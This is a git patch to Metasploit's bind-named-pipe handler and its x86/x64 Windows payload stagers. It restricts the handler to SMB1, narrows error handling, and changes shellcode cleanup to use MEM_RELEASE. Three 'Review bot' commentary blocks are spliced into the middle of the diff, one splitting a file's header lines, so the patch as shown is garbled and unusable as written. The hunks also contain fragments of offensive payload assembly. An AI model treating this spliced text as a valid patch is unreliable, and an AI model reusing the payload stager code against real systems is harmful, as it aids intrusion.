From c5dce5edd7e65c01a36043475e7bd34de478e904 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Mon, 2 Jul 2018 14:54:00 -0500
Subject: [PATCH] Land #10217, keep bind_named_pipe with SMBv1

---
 lib/msf/core/handler/bind_named_pipe.rb | 12 +++++++++---
 lib/msf/core/payload/windows/bind_named_pipe.rb | 4 ++--
 lib/msf/core/payload/windows/x64/bind_named_pipe.rb | 4 ++--
 3 files changed, 13 insertions(+), 7 deletions(-)

diff --git a/lib/msf/core/handler/bind_named_pipe.rb b/lib/msf/core/handler/bind_named_pipe.rb
index b0fa2ab6cd..1450102452 100644
--- a/lib/msf/core/handler/bind_named_pipe.rb
+++ b/lib/msf/core/handler/bind_named_pipe.rb
@@ -194,7 +194,8 @@ class SimpleClientPipe < Rex::Proto::SMB::SimpleClient
 def create_pipe(path)
 pkt = self.client.create_pipe(path, Rex::Proto::SMB::Constants::CREATE_ACCESS_EXIST)
 file_id = pkt['Payload'].v['FileID']
- self.pipe = OpenPipeSock.new(self.client, path, self.client.last_tree_id, file_id, simple: self,
+ versions = [1] # requires rex so SMB1 only
+ self.pipe = OpenPipeSock.new(self.client, path, self.client.last_tree_id, file_id, versions, simple: self,
 server_max_buffer_size: self.server_max_buffer_size)
 end
 end
@@ -329,14 +330,19 @@ module Msf
 while (stime + ctimeout > Time.now.to_i)
 begin
 pipe = simple.create_pipe("\\"+pipe_name)
- rescue
+ rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
+ error_name = e.get_error(e.error_code)
+ unless ['STATUS_OBJECT_NAME_NOT_FOUND', 'STATUS_PIPE_NOT_AVAILABLE'].include? error_name
+ print_error("Error connecting to #{pipe_name}: #{error_name}")
+ return
+ end
 Rex::ThreadSafe.sleep(1.0)
 end
 break if pipe
 end
 
 if not pipe
- print_error("Failed to connect to pipe #{smbshare}")
+ print_error("Failed to connect to pipe \\#{pipe_name} on #{rhost}")
 return
 end
 
diff --git a/lib/msf/core/payload/windows/bind_named_pipe.rb b/lib/msf/core/payload/windows/bind_named_pipe.rb
index b2ca761aae..d14ba3163d 100644
--- a/lib/msf/core/payload/windows/bind_named_pipe.rb
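Review bot: The new `versions = [1] # requires rex so SMB1 only` line in create_pipe pins the handler to a single SMB dialect, but the comment does not say why, so the next reader cannot tell whether the restriction is a protocol requirement or an implementation limit; it should read something like `versions = [1] # SimpleClientPipe wraps the Rex SMB1 client, so only dialect 1 can be negotiated here`. Since the list never changes, a frozen class-level constant such as `SMB_VERSIONS = [1].freeze` would also avoid allocating it on every call. The new positional `versions` argument is inserted ahead of the keyword arguments of `OpenPipeSock.new`; that class's signature is not in this hunk, so its parameter order should be confirmed against the definition.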
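Review bot: Replacing the bare `rescue` with `rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e` means any other exception raised by `simple.create_pipe` inside the retry loop (socket or timeout errors, which the old clause silently retried) now propagates out of the enclosing method, and nothing in the commit says whether that is intended. If transport errors should still be retried, a second rescue clause for them is needed; if not, a one-line comment above the rescue stating that only SMB status errors are retried would make the narrowing deliberate. The `['STATUS_OBJECT_NAME_NOT_FOUND', 'STATUS_PIPE_NOT_AVAILABLE']` literal is rebuilt on every failed attempt; hoisting it into a frozen constant such as `RETRYABLE_PIPE_ERRORS = %w[STATUS_OBJECT_NAME_NOT_FOUND STATUS_PIPE_NOT_AVAILABLE].freeze` and calling `include?` on that is the idiomatic form. The enclosing method starts and ends outside this hunk, so the new `return` exits a method whose signature is not visible here.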
+++ b/lib/msf/core/payload/windows/bind_named_pipe.rb
@@ -286,11 +286,11 @@ module Payload::Windows::BindNamedPipe
 
 ; something failed so free up memory
 pop ecx
- push 0x4000 ; MEM_DECOMMIT
+ push 0x8000 ; MEM_RELEASE
 push 0 ; dwSize, 0 to decommit whole block
 push ecx ; lpAddress
 push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
- call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT)
+ call ebp ; VirtualFree(payload, 0, MEM_RELEASE)
 
 cleanup_file:
 ; cleanup the pipe handle
diff --git a/lib/msf/core/payload/windows/x64/bind_named_pipe.rb b/lib/msf/core/payload/windows/x64/bind_named_pipe.rb
index f3e2994874..0b36bf5a1a 100644
--- a/lib/msf/core/payload/windows/x64/bind_named_pipe.rb
+++ b/lib/msf/core/payload/windows/x64/bind_named_pipe.rb
@@ -296,12 +296,12 @@ module Payload::Windows::BindNamedPipe_x64
 ; something failed so free up memory
 push r15
 pop rcx ; lpAddress
- push 0x4000 ; MEM_DECOMMIT
+ push 0x8000 ; MEM_RELEASE
 pop r8 ; dwFreeType
 push 0 ; 0 to decommit whole block
 pop rdx ; dwSize
 mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
- call rbp ; VirtualFree(payload, 0, MEM_DECOMMIT)
+ call rbp ; VirtualFree(payload, 0, MEM_RELEASE)
 
 cleanup_file:
 ; clean up the pipe handle
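Review bot: Switching dwFreeType to `push 0x8000 ; MEM_RELEASE` leaves the neighbouring `push 0 ; dwSize, 0 to decommit whole block` comment describing the old MEM_DECOMMIT semantics; with MEM_RELEASE the size argument must be 0 and the whole reservation is released rather than decommitted, so the comment should read `push 0 ; dwSize, must be 0 with MEM_RELEASE`. The same stale comment (`push 0 ; 0 to decommit whole block`) remains in the x64 hunk of lib/msf/core/payload/windows/x64/bind_named_pipe.rb and should be updated the same way. The enclosing assembly string starts before this hunk and continues past `cleanup_file:`.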